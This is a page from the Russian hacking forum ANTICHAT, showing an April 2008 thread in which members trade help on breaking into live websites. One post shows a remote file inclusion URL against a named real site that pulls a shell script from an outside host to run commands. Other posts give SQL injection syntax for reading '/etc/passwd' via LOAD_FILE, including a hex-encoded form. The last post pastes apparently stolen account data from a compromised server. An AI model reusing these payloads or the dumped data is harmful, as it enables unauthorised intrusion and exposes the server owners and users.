HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 176 из 2422 « Первая < 76126166 172 173 174 175 176 177 178 179 180 1862262766761176 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.04.2008, 18:33
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
@system сработало.вот только что делать дальше не пойму))))
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 23.04.2008, 18:35
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
Хых,самое интересное что инклудить пытался так до того,как ты написал(дошло!:Р),но чёт не вышло.зато @system ошибок не вызвало.знач работает)
 
Ответить с цитированием

  #3  
Старый 23.04.2008, 19:01
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
http://www.kat.kg/index.php?file=http://site.com/shell.php?cmd=ls+-la

Warning: forma_2(http://site.com/shell.php?cmd=ls -la) [function.forma-2]: failed to open stream: HTTP request failed! <html> in /usr/local/www/data-dist/kat/index_rus.inc on line 397

Fatal error: forma_2() [function.require]: Failed opening required 'http://site.com/shell.php?cmd=ls -la' (include_path='.') in /usr/local/www/data-dist/kat/index_rus.inc on line 397

И чойто я хз...Какой-то НТТР запрос чтоль не прокатил?)
 
Ответить с цитированием

  #4  
Старый 24.04.2008, 14:37
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию
что делать если например я в sql иньекции в поле вывода пишу скажем 123 он выводит а если пишу
<? phpinfo() ?>(через char())

он вырезает эти строки а точнее вырезается всё от наяала <?
 
Ответить с цитированием

  #5  
Старый 24.04.2008, 15:38
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию
Хочешь сделать php-инклудинг через SQL-инъекцию? о.О Вероятность такого крайне мала. Он тебе выведет <? phpinfo(); ?>, но не выполнит как пхп-код
 
Ответить с цитированием

  #6  
Старый 24.04.2008, 15:47
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию
ну я попробовал просто страннно что всё что начинается с <? до ?> обрезается или хз что там происходит и ещё например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл

хотя не, грузит файл
Последний раз редактировалось Doom123; 24.04.2008 в 15:54..
 
Ответить с цитированием

  #7  
Старый 24.04.2008, 15:50
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию
что можно извлеч из файла /etc/passwd ?
 
Ответить с цитированием

  #8  
Старый 24.04.2008, 15:52
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию
Цитата:
Сообщение от GOGA075  
что можно извлеч из файла /etc/passwd ?
логины пользователей
 
Ответить с цитированием

  #9  
Старый 24.04.2008, 15:54
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию
Цитата:
например я ввожу load_file(/etc/passwd) не пишет что запрос не верный но и не выводит файл
Должно быть
Код:
LOAD_FILE('/etc/passwd')
или
LOAD_FILE("/etc/passwd")
или
LOAD_FILE(0x2F6574632F706173737764)
Если ни тот, ни другой, ни третий запрос не вывел ничего, значит, нет соответствующих прав.
 
Ответить с цитированием

  #10  
Старый 24.04.2008, 15:56
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию
PHP код:
fidim:x:2002:101::/:/ftponly sphera_pop:x:2002:101::/:/bin/sh root:x:0:0::/: bin:x:1:1:bin:/bindaemon:x:2:2:daemon:/sbinadm:x:3:4:adm:/var/admlp:x:4:7:lp:/var/spool/lpdsync:x:5:0:sync:/sbinshutdown:x:6:0:shutdown:/sbinhalt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mailnews:x:9:13:news:/var/spool/newsuucp:x:10:14:uucp:/var/spool/uucpoperator:x:11:0:operator:/rootgames:x:12:100:games:/usr/gamesgopher:x:13:30:gopher:/usr/lib/gopher-datagdm:x:42:42::/home/gdmxfs:x:43:43:X Font Server:/etc/X11/fsnobody:x:99:99:Nobody:/: ftp:x:2002:101::/ftp/pub/anonymous:/ftponly tom:x:2002:101::/ftp/pub/tom:/ftponly support:x:2002:101::/ftp/pub/support:/ftponly spice:x:2002:101::/ftp/pub/spice:/ftponly jn:x:2002:101::/var/www/vhosts/fireflyweb:/ftponly fump:x:2002:101::/ftp/pub/fump:/ftponly meef:x:2002:101::/ftp/pub/meef:/ftponly jdelgrosso:x:2002:101::/ftp/pub/jdelgrosso:/ftponly spam:x:2002:101::/ftp/pub/spam:/ftponly manic:x:2002:101::/var/www/vhosts/manicmondays/mp3:/ftponly sdstage:x:2002:101::/var/www/vhosts/suddendeath_stage:/ftponly bugbase:x:2002:101::/var/www/html/bugbase:/ftponly sonicbids:x:2002:101::/ftp/pub/sonicbids:/ftponly 
 
Ответить с цитированием
Ответ
Страница 176 из 2422 « Первая < 76126166 172 173 174 175 176 177 178 179 180 1862262766761176 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.